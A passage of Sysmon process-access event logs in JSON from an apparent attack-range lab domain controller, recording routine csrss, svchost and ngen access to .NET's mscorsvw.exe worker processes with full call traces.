\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6850,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.918\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010BA9D0D00}\r\nTargetProcessId: 4940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.918","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010BA9D0D00}","TargetProcessId":"4940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6851,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010BA9D0D00}\r\nTargetProcessId: 4940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010BA9D0D00}","TargetProcessId":"4940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6852,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.980\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001062A10D00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.980","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001062A10D00}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6853,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.980\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001062A10D00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.980","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001062A10D00}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6854,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.980\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001062A10D00}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.980","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001062A10D00}","TargetProcessId":"2512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6855,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.011\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010D6A40D00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.011","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010D6A40D00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6856,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.011\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010D6A40D00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.011","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010D6A40D00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6857,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.027\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010D6A40D00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.027","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010D6A40D00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
